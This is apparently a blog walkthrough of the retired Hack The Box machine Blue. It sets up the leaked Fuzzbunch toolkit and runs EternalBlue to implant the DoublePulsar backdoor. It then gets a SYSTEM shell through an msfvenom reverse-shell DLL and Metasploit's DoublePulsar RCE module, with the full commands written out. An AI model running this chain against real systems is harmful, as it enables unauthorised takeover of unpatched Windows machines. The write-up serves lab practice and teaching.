HacktheBox | Blue | Fuzzbunch + DoublePulsar

This post is a thinly veiled excuse to get some Fuzzbunch content out there for people who’ve never used the tool, but wanted a thinly veiled excuse and a good target. I’m also posting this because William Vu recently wrote a few fantastic blog posts about the research behind his team’s new Metasploit module for DoublePulsar RCE on both SMB and RDP. Check out William’s Open-Source Command and Control of the DOUBLEPULSAR Implant for relevant reading and get some priceless insight into his approach.

If you’ve found this post but are fuzzy on the backstory Wikipedia has a great entry. TLDR: NSA cyber weapons, ransomware, everyone patched.

Disclaimer: Use Fuzzbunch at your own risk. Never run Fuzzbunch anywhere other than a lab environment, on VMs which you will revert/trash afterwards. Don’t do bad things to people who don’t patch, etc.

We’ll start by installing Wine + Fuzzbunch on an up-to-date Kali VM, then use it to attack HacktheBox’s retired box Blue using the EternalBlue plugin, implant DoulblePulsar, then execute commands via Fuzzbunch and Metasploit’s DoublePulsar RCE module (exploit/windows/smb/smb_doublepulsar_rce). Yes you need a HacktheBox VIP membership to access Blue, yes it’s 100% worth it, and yes you can follow along on an unlicensed copy of Windows 7 x64 that isn’t patched for EternalBlue (MS17–10).

What is DoublePulsar?

DoublePulsar is a Windows backdoor developed by the US government which runs in kernel mode and gives attackers on the local network RCE as SYSTEM. You can test for it using Ping and remotely uninstall it to remove IOC. It’s pretty awesome, and we’re going to infect a computer with it.

Installing Fuzzbunch

These installation steps are 100% taken from mdiazcl’s GitHub. See mdiazcl’s repo for a more thorough breakdown of the process, as I’m going to gloss over and combine steps into big blocks of commands for easy copy/paste into a terminal.

These commands set up Wine and Wine 32, configure the terminal, initialize the Wine environment, and open up a regedit.exe window.

apt update && apt install -qy wine winbind winetricks \
&& dpkg --add-architecture i386 && apt-get update \
&& apt-get install -qy wine32 \
&& WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot \
&& export WINEPREFIX=$HOME/.wine-fuzzbunch \
&& wine regedit.exe

In regedit, go to HKEY_CURRENT_USER > Environment, right click > New > String Value. Enter PATH as the name, then double click on PATH and set Value data to:

c:\\windows;c:\\windows\\system;C:\\Python26;C:\\fuzzbunch-debian\\windows\\fuzzbunch

Click OK, close regedit.exe.

Clone the Fuzzbunch repo, install Python 2.6, and launch the Wine environment. Click Next on any Python installer popups.

cd $HOME/.wine-fuzzbunch/drive_c \
&& git clone https://github.com/mdiazcl/fuzzbunch-debian.git \
&& winetricks python26 && cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows \
&& wine cmd.exe

Running EternalBlue and Implanting DoublePulsar

Launch Fuzzbunch in the Wine environment created in the previous step:

python fb.py

Most values can be left as default. Here’s what I used for Blue:

  • Default Target IP Address: 10.10.10.40
  • Default Callback IP Address: <YOUR IP GOES HERE>
  • Use Redirection: no
  • Base Log directory:<Default>
  • Project: 0
  • New Project Name: TestingDoublePulsar
  • Set target log directory to: <Default>

Next load and configure the EternalBlue plugin with the use command.

use EternalBlue

Leave all options as Default, except:

  • Mode: 1

Hit Enter to execute, your log should look something like this:

Reading through the log, you can see some parts are familiar from Metasploit’s EternalBlue module. You can also see that DoublePulsar was confirmed to have worked via a Ping test.

Verifying the DoublePulsar Implant

Invoke use and load the DoublePulsar plugin, to double check the implant worked.

use DoublePulsar

Leave all the values as default except:

  • Architecture: 1
  • Function: 1

Set the remaining options to Default, then hit Enter to execute the plugin.

Alternatively you can load msfconsole and use the DoublePulsar detection module:

use auxiliary/scanner/smb/smb_ms17_010

Popping Shells

First we’ll use Fuzzbunch’s DLL Injection module with DoublePulsar to get a reverse shell, then we’ll try it again with the cool new Metasploit module.

Use msfvenom to generate a DLL with a basic reverse shell and place it in the root of the Wine environment (~/.wine-fuzzbunch/drive_c).

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP GOES HERE> LPORT=443 -f dll -o runme.dll \
&& mv runme.dll ~/.wine-fuzzbunch/drive_c

Back in Fuzzbunch, reload DoublePulsar.

use DoublePulsar

Use the same default values as earlier, except set Functon to 2 for DLL Injection, and specify the path to the payload:

  • Function: 2
  • DllPayload: C:\runme.dll

Leave the rest as Default, create a netcat listener to catch the reverse shell, and execute the plugin.

Boom!

Metasploit’s DoublePulsar SMB RCE

Metasploit’s DoublePulsar RCE module is new, so if you’re on an old version of metasploit-framework, update with this one-liner.

curl -sL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | bash

After updating Metasploit, run msfconsole, then load the module:

use exploit/windows/smb/smb_doublepulsar_rce

Note: if after updating msf the DoublePulsar module is not found, exit msfconsole and reinitialize the database with msfdb init

Now set options and execute. You must set DefangedMode to False to execute the payload.

set LHOST tun0
set LPORT 443
set RHOSTS 10.10.10.40
set DefangedMode False
run

Disabling the Implant

The makers of DoublePulsar also included the ability to remove the implant remotely, so lets use it to clean up. From msfconsole, load the DoublePulsar SMB RCE if it’s not already loaded

use exploit/windows/smb/smb_doublepulsar_rce

Set options, don’t forget DefangedMode

set RHOSTS 10.10.10.40
set target 1
set DefangedMode False
run

Now run it.

Reload Metasploit’s DoublePulsar scanner from earlier and scan Blue. No more backdoor.

Conclusion

That’s how the pros do it. RCE to SYSTEM with a backdoor and fancy interface that anyone could use. Hopefully next time the NSA is more careful about who gets to play with their toys. Until then we’ll have our own toys like Metasploit, and devs like William Vu and his coworkers at Rapid7 adding useful modules to keep Blue Teams busy.

OSCE | OSCP | I like computers